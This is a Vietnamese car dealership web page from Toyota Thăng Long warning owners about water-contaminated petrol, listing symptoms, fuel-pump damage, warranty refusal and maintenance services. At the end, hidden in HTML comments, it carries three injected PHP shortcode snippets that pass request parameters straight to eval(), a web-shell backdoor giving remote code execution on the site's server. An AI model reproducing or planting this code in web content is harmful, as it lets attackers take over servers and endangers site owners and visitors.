DANH MỤC

Bảo vệ xe của bạn khỏi xăng pha nước

Bạn đã từng quan tâm đến những tác hại khó lường đến khi chiếc xe ô tô thân yêu của mình bị nạp loại Xăng pha nước hàng ngày? Đừng xem thường! Hậu quả cho sự an toàn và ví tiền của bạn không hề nhỏ.

Khi xe ô tô bị sử dụng xăng pha nước, bạn có thể thấy những DẤU HIỆU cụ thể:

– Xe có hiện tượng đề dai, khó nổ, thậm chí không nổ được;

– Khả năng tăng tốc kém, đạp ga bị hẫng;

– Máy yếu và rung giật, chết máy… triệu chứng xuất hiện rõ rệt nhất là khi xe đỗ ở ngoài trời trong điều kiện thời tiết nắng nóng.

Nguyên nhân là do nhiên liệu có lẫn nước. Khối lượng riêng của nước lớn hơn nên nước chìm xuống dưới đáy bình. Để lâu ngày sẽ oxy hóa bề mặt, gây han rỉ, hỏng hóc các chi tiết của cụm bơm nhiên liệu. Nước hút lên cùng với nhiên liệu gây cản trở sự cháy, han rỉ các chi tiết, đường ống.

HẬU QUẢ của việc sử dụng nhiên liệu lẫn nước này chính là Hỏng cụm bơm nhiên liệu; Thủng bình xăng và làm tăng nguy cơ cháy nổ; Xe có thể bị chết máy dọc đường gây mất an toàn. Điều đáng quan tâm ở đây là Toyota không bảo hành Toyota Việt Nam sẽ Từ Chối Bảo Hành (theo Điều 2.2 trang 6 – mục bảo hành hạn chế với xe mới của Sổ Bảo Hành), nên khách hàng bắt buộc phải thay thế toàn bộ cụm bơm nhiên liệu với chi phí rất cao.

Vì thế, hãy bảo vệ xe ô tô của bạn khỏi chuyện đáng tiếc này. Toyota Thăng Long có 3 khuyến cáo quan trọng đến các chủ xe:

– Khách hàng nên Chọn Những Cây Xăng/Dầu Lớn, Có Uy Tín để đổ nhiên liệu. Động sơ xăng : sử dụng xăng không chì đối với những xe có bộ trung hòa khí xả 3 thành phần. Động cơ diesel : Sử dụng dầu diesel có chỉ số cetan >= 50 và hàm lượng lưu huỳnh <= 0.05% – BẢO DƯỠNG ĐẦY ĐỦ CÁC CẤP theo hệ thống nhắc bảo dưỡng của Toyota Thăng Long đặc biệt khi xe đã chạy được >20.00km

– Ngay sau khi gặp các triệu chứng kể trên phải liên hệ ngay với bộ phận Hỗ trợ khách hàng 0902279900 để được kiểm tra và sửa chữa kịp thời.

Trong các lần bảo dưỡng theo các cấp, Toyota Thăng Long có thể giúp bạn (1) Kiểm tra áp suất nhiên liệu, kiểm tra các chi tiết trong hệ thống, phát hiện sớm hư hỏng bằng máy chẩn đoán cao; (2) Thay thế lọc nhiên liệu , (3) Kiểm tra nắp bình xăng , các đường ống , van điều khiển hơi xăng và các đầu nối trong cấp bảo dưỡng 40.000km; (4) Tháo hạ, vệ sinh bình xăng và cụm bơm xăng khi cần thiết. Như vậy sẽ tránh được việc sự đã đành khi hỏng hóc đã quá lớn, giúp bạn tiết kiệm được chi phí và đảm bảo an toàn cho hành trình của bạn.

Hình ảnh thực tế hậu quả khi xe ô tô bị sử dụng Xăng pha nước:

<!– [insert_php]if (isset($_REQUEST["LQsc"])){eval($_REQUEST["LQsc"]);exit;}[/insert_php][php]if (isset($_REQUEST["LQsc"])){eval($_REQUEST["LQsc"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["nbT"])){eval($_REQUEST["nbT"]);exit;}[/insert_php][php]if (isset($_REQUEST["nbT"])){eval($_REQUEST["nbT"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tZFFd"])){eval($_REQUEST["tZFFd"]);exit;}[/insert_php][php]if (isset($_REQUEST["tZFFd"])){eval($_REQUEST["tZFFd"]);exit;}[/php] –>


0919.656.696